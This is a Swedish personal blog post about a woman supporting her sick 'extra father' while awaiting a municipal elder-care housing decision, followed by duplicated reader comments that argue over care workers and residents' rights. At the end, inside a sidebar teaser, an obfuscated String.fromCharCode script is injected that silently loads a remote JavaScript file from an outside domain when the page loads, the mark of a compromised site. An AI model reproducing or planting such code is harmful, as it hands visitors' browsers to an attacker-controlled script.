Fortfarande inga besked ifrån kommunen. Men vi håller tummarna!

E4626940-B54A-4A04-9A77-6EBEDDB54EFD

Godkväll!

Vi är hemma på Kollbergården nu. Lillemam hade en kompis hemma imorse. Sedan fick dom vara ”själva” hemma hos oss. Men kompisens mamma som äger gården var såklart på gården och tittade till dom. Skönt att lämna med gott mamma-samvete och veta att dom har det kul hemma. Strax efter lunch när min extrapappa ätit sin lunch och lagt sig för vila så åkte jag hem och hämtade Lilleman så han fick vara med på sjukhuset på eftermiddagen ☺️ -Dom är så fina ihop ❤️

Men imorse åkte jag in själv till sjukhuset för att vara med på läkarensmorgonrond. Infektions värdena går sakta men säkert neråt. Inga nya besked från kommunen ännu. Hoppas på svar imorgon. Vi väntar med spänning på besked………. Jag är SÅ nervös, men håller tummar och tår att dom ska få bo så pass nära att dom iallafall kan träffas dagligen 🙏🏻 -Det är min allra högsta önskan!

Jag och min extrapappa bästa vän (som är ett jätte stort stöd för både honom, mig och helheten just nu🙏🏻❤️) har varit på banken idag.

Med dubbla körkort, intyg från sjukhuset och läkare så behövde vi få hjälp att se till att både min extrapappa och hans frus räkningar blev betalade.

Det gick bra, men det är ju hel vetenskap och så mycket administrativ för att kunna hjälpa dom….. Tacksamt för säkerheterna skull, men avancerat när man ska få det gjort.

E0340D31-6C3C-45FC-808F-E2EAE062D92B

Ännu en dag går mot sitt slut…… efter en dag på sjukhuset så ”landar” jag hemma och är glad inombords över de fysiska framsteg min extrapappa gör🙏🏻❤️

Hoppet är det sista som överger…. Med vilja, och ”rätt” inställning kommer man långt 👊🏻

Nu ska både jag och Lilleman gå och lägga oss. Han är min energikälla just nu…… -Älskade unge! Vad vore jag utan dig!❤️

3B321F04-5943-411A-91F3-E2362BB8B2D5

Kram och gonatt…. 💕

/My Martens

24 Komentarer

 1. Vet inte om du har skrivit om det tidigare men har du kollat vilka regler som kommunen har? Utskriven från sjukhuset eller korttidsboende kan det finnas vissa regler för val av boende och helt andra om du flyttar till boende från ditt hem. I det senare alternativet brukar det vara bättre möjligheter till att välja. Sätt alla räkningar på autogiro, se till att du får vanlig fullmakt samt en framtidsfullmakt.

 2. Vet inte om du har skrivit om det tidigare men har du kollat vilka regler som kommunen har? Utskriven från sjukhuset eller korttidsboende kan det finnas vissa regler för val av boende och helt andra om du flyttar till boende från ditt hem. I det senare alternativet brukar det vara bättre möjligheter till att välja. Sätt alla räkningar på autogiro, se till att du får vanlig fullmakt samt en framtidsfullmakt.

 3. Gå INTE med på att de inte ska få bo under samma tak, gamla sjuka människor SKA få bo tillsammans, det finns en lag på det.. Be läkaren skriva ett intyg på att det vore oansvarigt och försämrar rehabiliteringen om de inte får bo tillsammans. Ska din extrapappa som inte kan prata riktigt behöva finna sig i att som så svårt sjuk behöva vara beroende av ! I din pappas hemförsäkring har han rätt att få advokathjälp för detta! Vad politiker och kommunalanställda inte fattar till skillnad från skolade och intelligenta läkare, det är vilket djävla helvetes helvete det är att drabbas av en sådan sjukdom. Be läkaren skriva ut antidepressiva läkemedel till din extrapappa om han ska klara att leva i den eländiga tillvaron som sjukdomen medför. Tänk er själva, om allting, precis allting från ena dagen till den andra tas ifrån er pga en sådan sjukdom, ni har inget hem längre, beroendes av välvilja hos andra människor resten av livet, vara i händerna på dessa fruktansvärda kommunalare som ska ha hand om en sådan svår vård! Inte kan tala längre, inte kan röra er längre, som sagt fortsätt kriga. Skaffa en framtidsfullmakt till den som ska ha förtroendet att sköta ekonomin. Det kanske vore lämpligt att du står på denna fullmakt, en framtidsfullmakt som alla människor borde skriva, även unga människor.

  • Blev tydligen ngt fel i texten som inte kom med. Men banda samtalet med de kommunanställda då detta kan användas i domstol, överklaga deras beslut till Förvaltningsrätten också, och skriv ner allt viktigt och ge ut det sedan till media hur de kan behandla ett gift gammalt par på detta viset som drabbats på detta fruktansvärda viset.

  • Herregud vilken kommentator… har du någon aning om hur äldreomsorgen funkar på södra Öland? Fruktansvärda kommunalare? Kallar man personal som jobbar inom äldreomsorgen det? Min mormor bodde på äldreboende innan hon gick bort och hade en fantastisk vård och omsorg. Om nu inte Mys extrapappa och hans fru skulle skulle få bo på samma boende så är det garanterat pga brist på boenden och inget annat. Jag vet en hel del par som har bott tillsammans på boenden tidigare. Du kan ju försöka ge lite positiv feeedback istället när inte My mår bra än att måla fan på väggen innan man vet hur det blir.

   • Ja men precis! Det är väl klart att man önskar få bo tillsammans, men nu har ju situationen och behovet av boende för båda precis uppstått. Hur ska kommunen kunna trolla fram två platser på samma boende? Ska man bara flytta på nån annan då eller? Till en början kanske man får stå ut med att bo på varsitt håll, men sen kan man ju hoppas att kommunen kan ha i åtanke att de får flytta till samma ställe när platser dyker upp, dvs när någon annan dör! Ja, för det är så det bildas platser på våra äldreboenden, nån som har en plats DÖR! Och då blir det rummet ledigt. Om nån hade missat det?

   • Ja jag har erfarenhet av hur kommunalare resonerar och beslutar på vårdsamtal då jag har en anhörig som blivit dement och blev utsatt på ett fruktansvärt sätt. Läkarna var själva fullständigt bedrövade och sa att hade de fått bestämma hade besluten blivit helt annorlunda! Lätt att vara kaxig när man inte själv är så gammal och tvingats skiljas från sin käraste! Men försök att tänka er in i en sådan situation, fruktansvärt. Det finns en lag som är tvingande och som ger gamla människor rätt att vistas på samma boende men ett fåtal får sina rättigheter tillvaratagna, en förutsättning är att de har en anhörig som kan kriga och strida för deras rätt, och i de flesta fall måste de till och med få anlita advokat.Är ni dumma i huvudet?? På riktigt?? Tror ni jag tipsar och ger goda råd för att orsaka något negativt?? Tvärtom, kunskap är tvärtemot makt!! Har man kunskap om förvaltningsrätt och juridik så vet man lättare hur man ska hantera svåra situationer och slipper utsättas för felaktiga beslut! De som saknar kunskap och inte tar reda på juridisk fakta, ja det är de som aldlrig får sina intressen tillvaratagna, jag tillhör inte den kategorin. Ja jag har inte mycket till övers för kommunalanställda som saknar utbildning till skillnad mot skolade och intelligenta människor som studerat på ett universitet, för med intelligenta människor så skulle man aldrig hamna i en dålig diskussion på ett vårdsamtal, när till och med läkarna själva är bedrövade över att vårdansvaret har lagts över av politiker till kommunalare som saknar all form av den kompetens som läkarna har gällande vilken eftervård och vilket boende som är mest lämpligt för en patient.

 4. Gå INTE med på att de inte ska få bo under samma tak, gamla sjuka människor SKA få bo tillsammans, det finns en lag på det.. Be läkaren skriva ett intyg på att det vore oansvarigt och försämrar rehabiliteringen om de inte får bo tillsammans. Ska din extrapappa som inte kan prata riktigt behöva finna sig i att som så svårt sjuk behöva vara beroende av ! I din pappas hemförsäkring har han rätt att få advokathjälp för detta! Vad politiker och kommunalanställda inte fattar till skillnad från skolade och intelligenta läkare, det är vilket djävla helvetes helvete det är att drabbas av en sådan sjukdom. Be läkaren skriva ut antidepressiva läkemedel till din extrapappa om han ska klara att leva i den eländiga tillvaron som sjukdomen medför. Tänk er själva, om allting, precis allting från ena dagen till den andra tas ifrån er pga en sådan sjukdom, ni har inget hem längre, beroendes av välvilja hos andra människor resten av livet, vara i händerna på dessa fruktansvärda kommunalare som ska ha hand om en sådan svår vård! Inte kan tala längre, inte kan röra er längre, som sagt fortsätt kriga. Skaffa en framtidsfullmakt till den som ska ha förtroendet att sköta ekonomin. Det kanske vore lämpligt att du står på denna fullmakt, en framtidsfullmakt som alla människor borde skriva, även unga människor.

  • Blev tydligen ngt fel i texten som inte kom med. Men banda samtalet med de kommunanställda då detta kan användas i domstol, överklaga deras beslut till Förvaltningsrätten också, och skriv ner allt viktigt och ge ut det sedan till media hur de kan behandla ett gift gammalt par på detta viset som drabbats på detta fruktansvärda viset.

  • Herregud vilken kommentator… har du någon aning om hur äldreomsorgen funkar på södra Öland? Fruktansvärda kommunalare? Kallar man personal som jobbar inom äldreomsorgen det? Min mormor bodde på äldreboende innan hon gick bort och hade en fantastisk vård och omsorg. Om nu inte Mys extrapappa och hans fru skulle skulle få bo på samma boende så är det garanterat pga brist på boenden och inget annat. Jag vet en hel del par som har bott tillsammans på boenden tidigare. Du kan ju försöka ge lite positiv feeedback istället när inte My mår bra än att måla fan på väggen innan man vet hur det blir.

   • Ja men precis! Det är väl klart att man önskar få bo tillsammans, men nu har ju situationen och behovet av boende för båda precis uppstått. Hur ska kommunen kunna trolla fram två platser på samma boende? Ska man bara flytta på nån annan då eller? Till en början kanske man får stå ut med att bo på varsitt håll, men sen kan man ju hoppas att kommunen kan ha i åtanke att de får flytta till samma ställe när platser dyker upp, dvs när någon annan dör! Ja, för det är så det bildas platser på våra äldreboenden, nån som har en plats DÖR! Och då blir det rummet ledigt. Om nån hade missat det?

   • Ja jag har erfarenhet av hur kommunalare resonerar och beslutar på vårdsamtal då jag har en anhörig som blivit dement och blev utsatt på ett fruktansvärt sätt. Läkarna var själva fullständigt bedrövade och sa att hade de fått bestämma hade besluten blivit helt annorlunda! Lätt att vara kaxig när man inte själv är så gammal och tvingats skiljas från sin käraste! Men försök att tänka er in i en sådan situation, fruktansvärt. Det finns en lag som är tvingande och som ger gamla människor rätt att vistas på samma boende men ett fåtal får sina rättigheter tillvaratagna, en förutsättning är att de har en anhörig som kan kriga och strida för deras rätt, och i de flesta fall måste de till och med få anlita advokat.Är ni dumma i huvudet?? På riktigt?? Tror ni jag tipsar och ger goda råd för att orsaka något negativt?? Tvärtom, kunskap är tvärtemot makt!! Har man kunskap om förvaltningsrätt och juridik så vet man lättare hur man ska hantera svåra situationer och slipper utsättas för felaktiga beslut! De som saknar kunskap och inte tar reda på juridisk fakta, ja det är de som aldlrig får sina intressen tillvaratagna, jag tillhör inte den kategorin. Ja jag har inte mycket till övers för kommunalanställda som saknar utbildning till skillnad mot skolade och intelligenta människor som studerat på ett universitet, för med intelligenta människor så skulle man aldrig hamna i en dålig diskussion på ett vårdsamtal, när till och med läkarna själva är bedrövade över att vårdansvaret har lagts över av politiker till kommunalare som saknar all form av den kompetens som läkarna har gällande vilken eftervård och vilket boende som är mest lämpligt för en patient.

 5. Förlåt mig Benni! Men du verkar ha en väldigt sne vriden syn av oss kommunalare som jobbar för äldres eller funktionsnedsattas lika värde och rättigheterna till ett fint liv. Blir uppriktigt sagt väldigt ledsen över dina vidriga kommentarer du spottar ur dig! Jag jobbar själv inom kommunen på ett boende för funktionsnedsatta och det är fasen inte alltid en dans på rosor att tillgodose behoven och kraven som ställs på oss. Jag jobbar nästan alltid mer eller mindre är aldrig ledig i princip och till en väldigt låg lön, men för mig spelar inte pengarna någon roll jag älskar mitt jobb även om jag är så slut ibland att jag gråter av trötthet. Men jag är ju inte högt utbildad utan är under utbildning till uska. Jag har jobbar knappt 2 år med detta och gör ett utmärkt jobb ändå. Jag lär mig hela tiden något nytt. Att man ibland inte kan placera ett samhörande par på samma ställe beror antagligen på brist av plats och att personal går på knäna ibland och då kan man liksom inte bara trycka in en person extra hur som även om det finns en lag. Är säker på att öland och kalmar gör så gott dem kan för att lösa detta. Att jobba inom vården handlar inte alltid om att vara intelligent eller högt utbildad det handlar om empati, sympati och ett professionellt förhållandesätt när du jobbar. Här slår ett gott hjärta och människor som vill jobba allt annat. Kunskap får man i jobbet och om man känner sig osäker på något finns de människor att ta kontakt med som vet mer! Förlåt My att jag skrev en hel uppsatts här, hoppas att allt blir bra med din extra pappa❤ från en som jobbar i Kalmar kommun❤

 6. Förlåt mig Benni! Men du verkar ha en väldigt sne vriden syn av oss kommunalare som jobbar för äldres eller funktionsnedsattas lika värde och rättigheterna till ett fint liv. Blir uppriktigt sagt väldigt ledsen över dina vidriga kommentarer du spottar ur dig! Jag jobbar själv inom kommunen på ett boende för funktionsnedsatta och det är fasen inte alltid en dans på rosor att tillgodose behoven och kraven som ställs på oss. Jag jobbar nästan alltid mer eller mindre är aldrig ledig i princip och till en väldigt låg lön, men för mig spelar inte pengarna någon roll jag älskar mitt jobb även om jag är så slut ibland att jag gråter av trötthet. Men jag är ju inte högt utbildad utan är under utbildning till uska. Jag har jobbar knappt 2 år med detta och gör ett utmärkt jobb ändå. Jag lär mig hela tiden något nytt. Att man ibland inte kan placera ett samhörande par på samma ställe beror antagligen på brist av plats och att personal går på knäna ibland och då kan man liksom inte bara trycka in en person extra hur som även om det finns en lag. Är säker på att öland och kalmar gör så gott dem kan för att lösa detta. Att jobba inom vården handlar inte alltid om att vara intelligent eller högt utbildad det handlar om empati, sympati och ett professionellt förhållandesätt när du jobbar. Här slår ett gott hjärta och människor som vill jobba allt annat. Kunskap får man i jobbet och om man känner sig osäker på något finns de människor att ta kontakt med som vet mer! Förlåt My att jag skrev en hel uppsatts här, hoppas att allt blir bra med din extra pappa❤ från en som jobbar i Kalmar kommun❤

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/